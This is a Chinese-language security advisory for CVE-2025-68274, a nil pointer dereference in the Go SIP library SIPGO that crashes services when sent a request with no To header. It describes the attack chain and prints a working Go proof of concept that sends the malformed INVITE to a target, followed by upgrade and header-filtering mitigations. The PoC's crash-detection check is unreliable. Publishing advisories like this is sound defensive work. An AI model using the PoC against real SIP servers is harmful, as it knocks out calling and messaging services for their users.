CVE-2025-68274: SIPGO库NewResponseFromRequest函数空指针解引用拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-68274

漏洞类型

空指针解引用

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

SIPGO

漏洞概述

CVE-2025-68274是存在于SIPGO库中的一个高危空指针解引用漏洞。SIPGO是一个用于在Go语言中编写SIP服务的开源库。该漏洞影响0.3.0至1.0.0-alpha-1之间的所有版本。攻击者可以通过发送一个缺少To头的畸形SIP请求来触发该漏洞，导致目标SIP应用程序崩溃。由于该漏洞位于核心的NewResponseFromRequest函数中，会影响所有正常的SIP操作，包括呼叫建立、认证和消息处理等。这是一个无需认证即可远程利用的拒绝服务漏洞，CVSS评分达到7.5分，对可用性造成严重影响。

技术细节

该漏洞的根本原因在于SIPGO库在处理SIP请求时的防御性编程不足。具体来说，当SIP消息解析器成功解析一个缺少To头的SIP请求时，NewResponseFromRequest函数在创建响应时会假设To头必然存在，而没有进行必要的nil指针检查。这导致函数在访问To头相关属性时触发空指针解引用，最终造成应用程序崩溃。攻击者只需构造一个不包含To头的INVITE或其他SIP请求消息即可触发该漏洞。由于SIP协议广泛用于VoIP电话系统、视频会议和即时通讯等场景，任何使用受影响版本SIPGO库构建的SIP应用服务器、代理服务器或终端都存在被攻击的风险。该漏洞的利用复杂度低，属于无需认证即可远程利用的漏洞类型。

攻击链分析

STEP 1

Reconnaissance

攻击者识别运行SIPGO库的目标SIP服务器，探测其UDP端口5060（标准SIP端口）

STEP 2

Malformed Request Crafting

攻击者构造一个标准的SIP INVITE请求，但故意省略To头字段，这是触发漏洞的关键

STEP 3

Exploitation

通过UDP协议向目标服务器发送畸形SIP请求，NewResponseFromRequest函数在处理时触发空指针解引用

STEP 4

Impact

目标SIP应用程序崩溃，导致所有SIP服务中断，影响呼叫建立、认证和消息处理等核心功能

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

package main import ( "net" "strings" "time" ) // PoC for CVE-2025-68274: SIPGO nil pointer dereference // Send a malformed SIP INVITE request without To header func main() { // Target SIP server address target := "127.0.0.1:5060" // Malformed SIP INVITE request without To header // This triggers nil pointer dereference in NewResponseFromRequest malformedINVITE := "INVITE sip:[email protected] SIP/2.0\r\n" + "Via: SIP/2.0/UDP 192.168.1.100:5060;branch=z9hG4bK776sgk2\r\n" + "Max-Forwards: 70\r\n" + // Missing To header - this is the key trigger "From: <sip:[email protected]>;tag=12345\r\n" + "Call-ID: [email protected]\r\n" + "CSeq: 1 INVITE\r\n" + "Contact: <sip:[email protected]:5060>\r\n" + "Content-Type: application/sdp\r\n" + "Content-Length: 0\r\n" + "\r\n" // Connect and send malformed request conn, err := net.DialTimeout("udp", target, 5*time.Second) if err != nil { panic(err) } defer conn.Close() // Send the malicious SIP message _, err = conn.Write([]byte(malformedINVITE)) if err != nil { panic(err) } // Keep connection alive to observe crash time.Sleep(2 * time.Second) // Try to verify server is down _, err = conn.Write([]byte(strings.Replace(malformedINVITE, "INVITE", "OPTIONS", 1))) if err != nil { println("Target appears to be crashed (DoS successful)") } } /* Vulnerability Analysis: 1. The malformed SIP INVITE lacks the To header field 2. SIPGO's NewResponseFromRequest assumes To header exists 3. Without nil check, accessing To header causes crash 4. This affects all SIP operations using the vulnerable function Mitigation: Upgrade to SIPGO version 1.0.0-alpha-1 or later */

影响范围

SIPGO >= 0.3.0 且 < 1.0.0-alpha-1

防御指南

临时缓解措施

如果无法立即升级，可通过在SIP消息解析层添加预处理逻辑，在消息进入NewResponseFromRequest前验证To头是否存在。对于反向代理场景，可在代理层过滤缺少必需头字段的SIP请求。同时建议监控SIP服务可用性，设置崩溃告警，以便及时发现攻击行为。